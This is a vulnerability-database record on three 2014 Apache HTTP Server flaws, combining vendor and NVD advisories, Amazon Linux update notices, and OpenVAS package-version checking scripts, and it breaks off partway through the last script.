{"f5": [{"lastseen": "2016-03-19T09:01:48", "bulletinFamily": "software", "description": "Recommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-12-04T00:00:00", "published": "2014-12-04T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15893.html", "id": "SOL15893", "title": "SOL15893 - Apache HTTP server vulnerabilities CVE-2014-0117, CVE-2014-0118, CVE-2014-0226, CVE-2014-0231, and CVE-2014-3523", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-08-16T12:21:15", "bulletinFamily": "NVD", "description": "Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to cause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential information or execute arbitrary code, via a crafted request that triggers improper scoreboard handling within the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker function in modules/lua/lua_request.c.", "modified": "2017-12-09T02:29:00", "id": "CVE-2014-0226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0226", "published": "2014-07-20T11:12:00", "title": "CVE-2014-0226", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-16T12:21:15", "bulletinFamily": "NVD", "description": "The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before 2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service (resource consumption) via crafted request data that decompresses to a much larger size.", "modified": "2017-12-09T02:29:00", "id": "CVE-2014-0118", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0118", "published": "2014-07-20T11:12:00", "title": "CVE-2014-0118", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-16T12:21:15", "bulletinFamily": "NVD", "description": "The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which allows remote attackers to cause a denial of service (process hang) via a request to a CGI script that does not read from its stdin file descriptor.", "modified": "2018-10-30T16:25:00", "id": "CVE-2014-0231", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0231", "published": "2014-07-20T11:12:00", "title": "CVE-2014-0231", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "amazon": [{"lastseen": "2019-05-29T17:22:34", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the \"apache\" user. ([CVE-2014-0226 __](<https://access.redhat.com/security/cve/CVE-2014-0226>))\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the \"DEFLATE\" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system. ([CVE-2014-0118 __](<https://access.redhat.com/security/cve/CVE-2014-0118>))\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. ([CVE-2014-0231 __](<https://access.redhat.com/security/cve/CVE-2014-0231>))\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n mod24_proxy_html-2.4.10-1.59.amzn1.i686 \n httpd24-2.4.10-1.59.amzn1.i686 \n httpd24-debuginfo-2.4.10-1.59.amzn1.i686 \n mod24_ldap-2.4.10-1.59.amzn1.i686 \n httpd24-tools-2.4.10-1.59.amzn1.i686 \n mod24_ssl-2.4.10-1.59.amzn1.i686 \n httpd24-devel-2.4.10-1.59.amzn1.i686 \n mod24_session-2.4.10-1.59.amzn1.i686 \n \n noarch: \n httpd24-manual-2.4.10-1.59.amzn1.noarch \n \n src: \n httpd24-2.4.10-1.59.amzn1.src \n \n x86_64: \n mod24_proxy_html-2.4.10-1.59.amzn1.x86_64 \n httpd24-tools-2.4.10-1.59.amzn1.x86_64 \n mod24_ldap-2.4.10-1.59.amzn1.x86_64 \n httpd24-2.4.10-1.59.amzn1.x86_64 \n httpd24-debuginfo-2.4.10-1.59.amzn1.x86_64 \n httpd24-devel-2.4.10-1.59.amzn1.x86_64 \n mod24_session-2.4.10-1.59.amzn1.x86_64 \n mod24_ssl-2.4.10-1.59.amzn1.x86_64 \n \n \n", "modified": "2014-09-19T11:40:00", "published": "2014-09-19T11:40:00", "id": "ALAS-2014-389", "href": "https://alas.aws.amazon.com/ALAS-2014-389.html", "title": "Important: httpd24", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:22:56", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the \"apache\" user. ([CVE-2014-0226 __](<https://access.redhat.com/security/cve/CVE-2014-0226>))\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the \"DEFLATE\" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system. ([CVE-2014-0118 __](<https://access.redhat.com/security/cve/CVE-2014-0118>))\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. ([CVE-2014-0231 __](<https://access.redhat.com/security/cve/CVE-2014-0231>))\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-tools-2.2.27-1.3.amzn1.i686 \n httpd-devel-2.2.27-1.3.amzn1.i686 \n httpd-2.2.27-1.3.amzn1.i686 \n mod_ssl-2.2.27-1.3.amzn1.i686 \n httpd-debuginfo-2.2.27-1.3.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.27-1.3.amzn1.noarch \n \n src: \n httpd-2.2.27-1.3.amzn1.src \n \n x86_64: \n httpd-tools-2.2.27-1.3.amzn1.x86_64 \n httpd-devel-2.2.27-1.3.amzn1.x86_64 \n mod_ssl-2.2.27-1.3.amzn1.x86_64 \n httpd-2.2.27-1.3.amzn1.x86_64 \n httpd-debuginfo-2.2.27-1.3.amzn1.x86_64 \n \n \n", "modified": "2014-09-19T11:39:00", "published": "2014-09-19T11:39:00", "id": "ALAS-2014-388", "href": "https://alas.aws.amazon.com/ALAS-2014-388.html", "title": "Important: httpd", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310881968", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881968", "title": "CentOS Update for httpd CESA-2014:0920 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2014:0920 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881968\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:31:47 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for httpd CESA-2014:0920 centos6\");\n\n script_tag(name:\"affected\", value:\"httpd on CentOS 6\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0920\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-July/020441.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-27T10:48:54", "bulletinFamily": "scanner", "description": "Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118 \nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226 \nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231 \nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.", "modified": "2017-07-12T00:00:00", "published": "2014-07-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=702989", "id": "OPENVAS:702989", "title": "Debian Security Advisory DSA 2989-1 (apache2 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2989.nasl 6692 2017-07-12 09:57:43Z teissa $\n# Auto-generated from advisory DSA 2989-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"apache2 on Debian Linux\";\ntag_insight = \"The Apache Software Foundation's goal is to build a secure, efficient and\nextensible HTTP server as standards-compliant open source software. The\nresult has long been the number one web server on the Internet.\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\";\ntag_summary = \"Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118 \nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226 \nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231 \nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702989);\n script_version(\"$Revision: 6692 $\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_name(\"Debian Security Advisory DSA 2989-1 (apache2 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-12 11:57:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-07-24 00:00:00 +0200 (Thu, 24 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2989.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:40", "bulletinFamily": "scanner", "description": "Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226\nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231\nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.", "modified": "2019-03-19T00:00:00", "published": "2014-07-24T00:00:00", "id": "OPENVAS:1361412562310702989", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702989", "title": "Debian Security Advisory DSA 2989-1 (apache2 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2989.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2989-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702989\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_name(\"Debian Security Advisory DSA 2989-1 (apache2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-24 00:00:00 +0200 (Thu, 24 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2989.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed 